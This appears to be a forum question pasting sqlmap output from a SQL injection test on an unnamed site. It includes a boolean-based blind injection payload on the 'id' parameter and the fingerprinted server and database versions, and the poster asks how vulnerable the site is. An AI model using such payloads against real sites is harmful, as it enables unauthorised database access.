I ran SQLMAP to test SQL injection for one of the site, and got the below information.
sqlmap identified the following injection points with a total of 78 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=666' AND 1737=1737 AND 'pQMi'='pQMi
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 1.1.4322, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
I am not sure, to what extent is this site vulnerable with this much information?